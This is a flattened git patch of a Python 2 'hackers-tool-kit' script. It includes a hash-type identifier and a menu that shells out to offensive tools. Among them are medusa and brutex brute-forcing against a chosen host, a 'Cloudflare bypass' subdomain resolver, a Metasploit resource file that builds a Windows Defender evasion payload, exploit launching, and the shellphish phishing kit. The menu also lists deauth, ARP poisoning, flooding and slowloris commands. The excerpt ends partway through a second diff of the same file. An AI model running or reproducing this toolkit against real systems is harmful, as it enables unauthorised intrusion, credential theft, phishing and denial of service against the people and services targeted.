hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > handler.rc') - os.system('echo "set payload {0}\n" >> handler.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> handler.rc') - os.system('echo "set LPORT {0}\n" >> handler.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> handler.rc'.format(name)) - os.system('echo "run\n" >> handler.rc') - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> handler.rc'.format(f)) - os.system('echo "show options\n" >> handler.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> handler.rc') - os.system('echo "services\n" >> handler.rc') - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - found = True -mainbanner() -main() From 82512f3f808cf5bb46d365a2c56b21bbff336139 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 22 Feb 2019 04:30:53 +0100 Subject: [PATCH 020/214] Add files via upload --- htk.py | 1976 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 1976 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..32ad580 --- /dev/null +++ b/htk.py @@ -0,0 +1,1976 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to edit this script without my credit +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * 